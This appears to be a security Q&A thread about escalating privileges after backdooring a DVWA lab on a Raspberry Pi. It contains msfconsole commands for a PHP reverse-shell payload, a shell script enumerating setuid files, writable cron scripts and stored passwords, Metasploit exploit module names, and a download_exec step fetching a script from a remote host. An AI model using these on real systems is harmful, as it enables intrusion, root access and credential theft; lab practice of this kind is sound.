
I am messing around with Kali Linux, MSFConsole and DVWA (Damn Vulnerable Web Application).

I have successfully been able to get into the system (Raspberry Pi) by creating a PHP backdoor and uploading it via SQL injection.

Now I have access to the system; the only issue is that I am running as www-data (wouldn't it be nice to become root to create your own super user account?!). Is it possible to somehow privilege escalate in Linux (Raspbian) by using MSFConsole, BASH (from the backdoor) or another way?

I have tried to run "use priv" in the meterpreter prompt but the error I get is 'Failed to load extension: No module of the name ext_server_priv.php found'. If it helps I am running the reverse_tcp exploit as a PHP script.

I was able to compromise the system by running this in msfconsole:

use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit

I then uploaded hackme.php to the web server via the insecure file upload; after I had done that I browsed to the uploaded file.

Credit goes to this video for giving me the above code. (I had to use the generate function instead of msfpayload because that functionality has been moved due to it being deprecated.)

iProgram

3 Answers


At this point you've achieved the basics of a compromise on the system and you're on to the common phase two of exploitation which is privilege escalation.

Exactly how you can achieve that depends very much on the system in question, what code is installed on it and how it's configured. Some options for things to look for to get privilege escalation on a Linux system:

  • SetUID root binaries that are writable by the user you are running as. If you can find something you can overwrite which, when executed, will run as root, you can use this to escalate your privileges.
  • Vulnerabilities in system services running as root. This will likely depend on the patch status of the system that you're running on.

Other things which apply more in "real-world" security tests but which are unlikely to apply to your situation:

  • Credentials exposed in files on the system. This can be a common way to exploit systems.
  • Password guessing attacks. Guessing credentials is a good way to gain additional access.
  • Pivoting from your attacked system to another one in the same network. Typically once an attacker has a foothold in a network they will scan for other systems which may have additional misconfigurations that could be exploited.
Rory McCune
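As an added example (not code from the original answer, and not part of Metasploit), the following script turns the first three items above into a read-only enumeration pass that can be run from the www-data shell: writable setuid files, writable files in places root executes scripts from, and credential-looking lines in configuration files. The root-directory argument, the choice of cron/init paths and the credential regex are illustrative assumptions; it needs only a POSIX /bin/sh with find and grep.

```shell
#!/bin/sh
# Added example, not from the original answer: read-only enumeration of the
# privilege-escalation candidates listed above, run from an unprivileged shell
# such as the www-data backdoor.  Nothing here exploits anything; it only lists
# what to look at next.  Usage: sh privesc_enum.sh /   (any root directory
# works, which also lets the checks run against a constructed directory tree).

# Setuid files under a directory, one path per line.  On a real target the
# interesting ones are owned by root; "ls -l" on the result shows the owner.
find_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Setuid files the current user can write.  Overwriting one means the next
# execution runs attacker-controlled code as the file's owner.
writable_setuid() {
    find_setuid "$1" | while IFS= read -r f; do
        if [ -w "$f" ]; then printf '%s\n' "$f"; fi
    done
}

# Files that root runs periodically or at boot (cron drop-ins, init scripts)
# that the current user can modify.  Sub-directories are given relative to the
# root so the same check works on a mirror of the target (assumed layout).
writable_root_scripts() {
    root="$1"; shift
    for d in "$@"; do
        [ -d "$root/$d" ] || continue
        find "$root/$d" -xdev -type f 2>/dev/null | while IFS= read -r f; do
            if [ -w "$f" ]; then printf '%s\n' "$f"; fi
        done
    done
}

# Lines in configuration-like files that look like stored credentials
# (a database password in a web app's config.php is the classic case).
# Output is "file:line:text"; the extension list and regex are assumptions.
find_credentials() {
    find "$1" -xdev -type f \( -name '*.php' -o -name '*.conf' -o -name '*.ini' \
        -o -name '*.cfg' -o -name '*.yml' -o -name '*.yaml' -o -name '*.env' \) \
        -exec grep -HEin '(password|passwd|pwd|secret)[[:space:]]*[=:]' {} + \
        2>/dev/null || :
}

# Facts needed to pick a kernel or service exploit: who we are, the kernel
# release, the distro, and whether the user already has password-less sudo.
host_facts() {
    printf 'user:   %s\n' "$(id)"
    printf 'kernel: %s\n' "$(uname -r)"
    [ -r /etc/os-release ] && grep '^PRETTY_NAME=' /etc/os-release
    sudo -n -l 2>/dev/null || :
}

main() {
    echo "== setuid files writable by $(id -un) under $1 =="
    writable_setuid "$1"
    echo "== writable files in cron/init paths =="
    writable_root_scripts "$1" etc/cron.d etc/cron.daily etc/cron.hourly etc/init.d
    echo "== credential-looking lines under $1/etc and $1/var/www =="
    find_credentials "$1/etc"
    find_credentials "$1/var/www"
    echo "== host facts =="
    host_facts
}

# Run only when a root directory is given, so the file can also be sourced.
if [ $# -gt 0 ]; then main "$1"; fi
```

Run it as `sh privesc_enum.sh /` from the compromised shell (uploading it through the same insecure file upload is the obvious route). Treat each hit as a lead rather than a result: a writable setuid-root file is the direct win the answer describes, a writable cron job only pays off when root actually runs it, and a stored database password matters mostly if it is reused for a system account.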

According to the Metasploit documentation, "use priv" is a module available to the native Windows meterpreter only (not other meterpreters).

You probably want to look into Unix privilege escalation, which I do not know about. I do not believe there's an automated module for Metasploit that would do that...

Good luck ;)

RedPanda

You can upgrade your shell to a Meterpreter with sessions -u <#> and then run post modules (e.g., post/multi/recon/local_exploit_suggester) or you can also take an existing session (Meterpreter or not) and run a local privilege escalation exploit, e.g., udev_netlink, sock_sendpage, et al, by setting the SESSION variable.

Some modules vary by OS or scenario, some are just difficult to find in the metasploit-framework hierarchy. Try the following from within meterpreter:

show post

run post/multi/<tab><tab>

run post/linux/<tab><tab>

run exploit/multi/<tab><tab>

You can also run a variety of privilege-escalation tools outside of the metasploit-framework and launch them into your session. Here are two modules which aid in this endeavor:

use post/multi/gather/multi_command

set RESOURCE cmds.rc

use post/linux/manage/download_exec

set URL http://10.0.0.1/cmds.sh

I suggest that you prepare a system in a lab that matches the qualities of your target system, e.g., same OS, patchlevel, installables, configuration settings, et al. By maintaining root access on this mocked-up lab target, you can recreate what you will attempt to do to the real target. A lot of privilege-escalation tools require root access in order to run them properly, e.g., Nessus and OpenVAS in credentialed mode, CIS-CAT, ovaldi, cvechecker, lynis, unix-privesc-check, and enum4linux are all great tools in this space. Others will have to be run only on the real target system, such as sucrack or phrasendrescher. Some privilege escalation attacks require significantly more planning, such as exploitation of custom setuid/setgid binaries. The RPi will likely require a cross compiler for exploits, and many may not even work unless you change offsets to work with the registers, opcodes, and endianness of the ARM platform.

atdre